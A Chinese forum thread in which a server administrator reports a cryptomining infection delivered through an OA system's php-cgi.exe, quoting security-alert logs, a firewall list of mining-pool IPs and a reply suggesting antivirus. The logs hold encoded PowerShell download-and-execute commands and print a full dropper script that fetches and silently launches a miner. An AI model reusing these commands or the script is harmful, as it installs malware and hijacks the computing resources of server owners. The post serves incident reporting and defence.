通过OA的php-cgi.exe 中挖矿病毒 耗尽服务器资源

setback

服务器中毒了。查杀了一次，又换了其它恶意源，杀毒软件杀不出来，服务器2012R2,OA是2017最新10.20
检查日志发现：
通过调用 oa的 php-cgi.exe 去下载执行https://www.naosbio.com/images/main/js/ax.txt 脚本 安装 MSASC.exe 程序
然后通过此程序访问矿机中控耗尽服务器cpu和内存。
第一步： 安装MSASC并执行
进程异常行为-访问恶意下载源  2020-06-06 05:54:11
父进程路径：D:/MYOA/bin/php-cgi.exe
父进程命令行：D:\MYOA\bin\php-cgi.exe
父进程id：3704
进程ID：14824
URL链接：https://www.naosbio.com/images/main/js/ax.txt
进程路径：C:/Windows/SysWOW64/cmd.exe
命令行参数：cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==

进程异常行为-异常调用系统工具 2020-06-06 05:54:12
命令行：powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
进程路径：C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe
进程ID：15048
父进程命令行：cmd /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==
父进程文件路径：C:/Windows/SysWOW64/cmd.exe
https://www.naosbio.com/images/main/js/ax.txt  执行脚本，下载 程序MSASC

1. $ne = $MyInvocation.MyCommand.Path
   
2. $miner_url = "https://www.naosbio.com/images/main/js/a/MSASC.exe"
   
3. $miner_url_backup = "https://www.naosbio.com/images/main/js/a/MSASC.exe"
   
4. $miner_name = "MSASC"
   
5. $miner_cfg_url = "https://www.naosbio.com/images/main/js/a/config.json"
   
6. $miner_cfg_url_backup = "https://www.naosbio.com/images/main/js/a/config.json"
   
7. $miner_cfg_name = "config.json"
   
8. $killmodule_url = "https://www.naosbio.com/images/main/js/a/clean.bat"
   
9. $killmodule_url_backup = "https://www.naosbio.com/images/main/js/a/clean.bat"
   
10. $killmodule_name = "clean.bat"
    
11. $miner_path = "$env:TMP\MSASC.exe"
    
12. $miner_cfg_path = "$env:TMP\config.json"
    
13. $payload_path = "$env:TMP\update.ps1"
    
14. $killmodule_path = "$env:TMP\clean.bat"
    
15. function Update($url,$backup_url,$path,$proc_name)
    
16. {        
    
17.     Get-Process -Name $proc_name | Stop-Process
    
18.     Remove-Item $path
    
19.     Try {
    
20.         $vc = New-Object System.Net.WebClient
    
21.         $vc.DownloadFile($url,$path)
    
22.     }
    
23.     Catch {
    
24.         Write-Output "donwload with backurl"
    
25.         $vc = New-Object System.Net.WebClient
    
26.         $vc.DownloadFile($backup_url,$path)
    
27.     }
    
28. }
    
29. #miner_path
    
30. 
    
31. #clean.bat
    
32. if((Test-Path $killmodule_path))
    
33. {
    
34.     Remove-Item $killmodule_path
    
35.         Update $killmodule_url $killmodule_url_backup $killmodule_path $killmodule_name
    
36. }
    
37. else {
    
38.     Update $killmodule_url $killmodule_url_backup $killmodule_path $killmodule_name
    
39. }
    
40. 
    
41. if(!(Get-Process $miner_name -ErrorAction SilentlyContinue))
    
42. {
    
43.     Update $miner_url $miner_url_backup $miner_path $miner_name
    
44.     Update $miner_cfg_url $miner_cfg_url_backup $miner_cfg_path $miner_cfg_name
    
45.         Start-Process $miner_path -windowstyle hidden
    
46. }
    
47. else
    
48. {
    
49.         Write-Output "Miner Running"
    
50. }
    
51. Start-Process cmd.exe "/c $killmodule_path" -windowstyle hidden

复制代码

进程异常行为-可疑文件落盘执行  2020-06-06 05:54:15

命令行："C:\Windows\TEMP\MSASC.exe"
进程路径：C:/Windows/Temp/MSASC.exe
进程ID：3440
父进程命令行：powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbgBhAG8AcwBiAGkAbwAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwBtAGEAaQBuAC8AagBzAC8AYQB4AC4AdAB4AHQAJwApAA==

第二步： 运行MSASC 访问矿机中控
恶意进程（云查杀）-挖矿程序  2020-06-06 05:54:19

文件路径：C:/Windows/Temp/MSASC.exe
恶意文件md5：b5fa5e04c916ca653a01e209754bc2fa
进程id：3,440
描述：通常黑客入侵后会植入挖矿程序赚取收益，

异常网络连接-矿池通信行为   2020-06-06 05:59:07
矿池IP：94.23.23.52
矿池端口：3333
进程路径：C:/Windows/Temp/MSASC.exe
进程ID：3440
命令行参数："C:\Windows\TEMP\MSASC.exe"




恶意进程（云查杀）2020-06-06 06:49:03

中控IP：37.187.95.110
中控端口：3333
进程路径：c:/windows/temp/msasc.exe
命令行参数："C:\Windows\TEMP\MSASC.exe"
事件说明：云盾检测到您的服务器的进程正在尝试访问一个可疑的恶意IP

矿机中控IP：可以加到防火墙拒绝以下IP连接
210.108.70.119,
94.23.247.226,
37.59.55.60,
37.59.43.131,
149.202.83.171,
91.121.140.167,
94.23.23.52,
37.187.95.110,
185.92.222.223,
94.130.165.85,
1.246.220.121

setback

-------------------------
前期也中了挖矿病毒，也是 通过调用 oa的 php-cgi.exe  文件，在OA的文件夹下生产了一些其它的文件，当时直接删除了，没有保存。

进程异常行为-访问恶意下载源

父进程路径：D:/MYOA/bin/php-cgi.exe
父进程命令行：D:\MYOA\bin\php-cgi.exe
父进程id：3244
进程ID：28184
URL链接：http://13.115.195.195:801/muma.ps1
进程路径：C:/Windows/SysWOW64/cmd.exe
命令行参数：cmd /c powershell -enc IEX (New-Object System.Net.Webclient).DownloadString('http://13.115.195.195:801/muma.ps1')
与该URL有关联的漏洞：None
事件说明：云盾检测到您的服务器正在尝试访问一个可疑恶意下载源

lqy_5

建议安装个火绒，查杀一下。